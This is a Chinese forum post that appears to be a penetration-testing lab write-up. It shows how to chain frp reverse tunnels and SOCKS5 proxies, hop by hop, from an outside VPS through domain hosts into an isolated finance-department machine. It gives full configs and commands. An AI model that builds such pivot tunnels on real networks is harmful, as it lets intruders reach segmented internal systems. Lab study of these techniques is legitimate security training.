电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2118 人浏览分享

渗透测试:Frp 内网穿透

[复制链接]
2118 0
前言

最近在跟师傅学习有关内网的知识 了解了frp隧道的搭建与利用 这里准备复现一下隧道的搭建过程与利用方式
Frp链接:https://github.com/fatedier/frp/releases/tag/v0.34.3
注:Frp是一个搭建隧道的专用脚本 存在客户端与服务端 在进行内网穿透时能起到一个很好效果
这里我将使用frp对内网穿透进行复现
拓补图:注:(IP地址不太一样需自行比对)

QQ截图20210707145141.png

复现过程

1、一级网络环境

服务端
  1. \/PS:[common]
  2. bind_addr = 0.0.0.0  #本地IP
  3. bind_port = 7788     #开放与客户端连接的端口

  4. frps.exe -c frps.ini
复制代码

QQ截图20210707145523.png

客户端
  1. 域普通用户:# frpc.ini
  2. [common]
  3. server_addr = 192.168.253.11  #\/PS
  4. server_port = 7788   #与\/PS服务器开放端口一致
  5. [http_proxy]
  6. type = tcp        #类型
  7. remote_port = 7777 #通过socks5连接到\/PS服务器端口进行数据传输
  8. plugin = socks5

  9. frpc.exe -c frpc.ini
复制代码

5608.png

验证成功:

99.png

2、二级网络环境
环境:
A:/PS服务器:192.168.174.147 (win7系统模拟)
B:子域普通用户:192.168.174.141和10.10.3.100
C:子域控制器:10.10.3.10和10.10.21.0/24

注:内网C主机不能直接连接/ps 可以连接内网B主机 B主机可以直接连接/ps
所以通过B作为跳板 将socks代理建设在内网C主机中后!

(1)首先在/PS服务器上开启端口
  1. 服务端
  2. \/PS:[common]
  3. bind_addr = 0.0.0.0
  4. bind_port = 7788    #开放与客户端连接的端口

  5. frps.exe -c frps.ini
复制代码

98.png

2,在子域用户与子域之间构造一级隧道

在子域普通用户开启端口
  1. 子域用户服务端
  2. Frps.ini设置:[common]
  3. bind_addr = 10.10.3.100  #子域用户本地IP
  4. bind_port = 7799      #开放与客户端(子域)连接的端口

  5. frps.exe -c frps.ini
复制代码

97.png

  1. 子域客户端
  2. # frpc.ini
  3. [common]
  4. server_addr = 10.10.3.100 #服务器的IP地址
  5. server_port = 7799        #连接到子域服务器开放的端口,且与子域服务器端口一致
  6. [http_proxy]
  7. type = tcp #协议类型
  8. remote_port = 1080 #通过socks5连接到子域用户服务器端口进行数据传输
  9. plugin = socks5

  10. frpc.exe -c frpc.ini
复制代码

96.png

  1. 子域用户客户端
  2. # frpc.ini
  3. [common]
  4. server_addr = 192.168.174.147 #\/PS服务器
  5. server_port = 7788  #与\/PS服务器爆出端口一致
  6. [http_proxy]
  7. type = tcp
  8. local_ip = 10.10.3.100  #访问的ip可以是内网任何一个ip
  9. local_port = 1080        #本地端口(根据协议修改)
  10. remote_port = 1080  #\/PS远程服务器的ip端口

  11. frpc.exe -c frpc.ini
复制代码

93.png

验证成功:

92.png

3、三级网络环境
A:/PS服务器:192.168.174.147
B:子域普通用户:192.168.174.150和10.10.3.100
C:子域控制器:10.10.3.10和10.10.21.5
D:财务部独立子域:10.10.21.2和172.16.5.2
E:财务部核心区机器:172.16.5.5

注:内网E核心区主机不能直接连接/ps,可以连接内网D主机 内网D主机不能直接连接/ps 可以连接内网C主机
内网C主机不能直接连接/ps,可以连接内网B主机,B主机可以直接连接/ps,所以通过B作为跳板 将socks代理
建设在内网C主机中后 将打通隧道进行横向攻击核心区机器!开始!!

(1)首先在/PS服务器上开启端口

/PS服务器
  1. 服务端
  2. \/PS:[common]
  3. bind_addr = 0.0.0.0
  4. bind_port = 7788    #开放与客户端连接的端口

  5. frps.exe -c frps.ini
复制代码

91.png

(2)子域控制器与财务部独立子域建立一级隧道
子域控制器
  1. 服务端
  2. [common]
  3. bind_addr = 10.10.21.5 #本地IP地址
  4. bind_port = 7799   #开放与客户端(财务部核心系统)连接的端口

  5. frps.exe -c frps.ini
复制代码

90.png

3,财务部独立子域,
  1. 客户端
  2. [common]
  3. server_addr = 10.10.21.5 #子域控制器服务器的IP地址
  4. server_port = 7799     #连接到子域服务器开放的端
  5. [http_proxy]
  6. type = tcp
  7. remote_port = 7766#通过socks5连接到子域控制器端口进行数据传输               
  8. plugin = socks5

  9. frpc.exe -c frpc.ini
复制代码

89.png

(4)子域普通用户与子域控制器搭建二级隧道

子域普通用户
  1. 服务端
  2. # frpc.ini
  3. [common]
  4. bind_addr = 10.10.3.100
  5. bind_port = 7755  #开放与子域控制器连接的端口
复制代码

88.png

子域控制器
  1. # frpc.ini
  2. [common]
  3. server_addr = 10.10.3.100 #子域普通用户IP
  4. server_port = 7755 #与子域普通用户开放端口相同
  5. [http_proxy]
  6. type = tcp
  7. local_ip = 10.10.21.5 #本地IP 访问的ip可以是内网任何一个ip
  8. local_port = 7766 #本地端口(根据协议修改)
  9. remote_port = 7766  #子域普通用户的7766端口
复制代码

87.png

5,子域普通用户与/PS服务器构建三级隧道,
  1. # frpc.ini
  2. [common]
  3. server_addr = 192.168.174.147 #\/PS服务器IP
  4. server_port = 7788 #与\/PS服务器开放端口一样
  5. [http_proxy]
  6. type = tcp
  7. local_ip = 10.10.3.100 #
  8. local_port = 7766  #本地端口(根据协议修改)
  9. remote_port = 7766  #\/PS服务器端口

  10. frpc.exe -c frpc.ini
复制代码

86.png

验证:可以进行远程登录

85.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.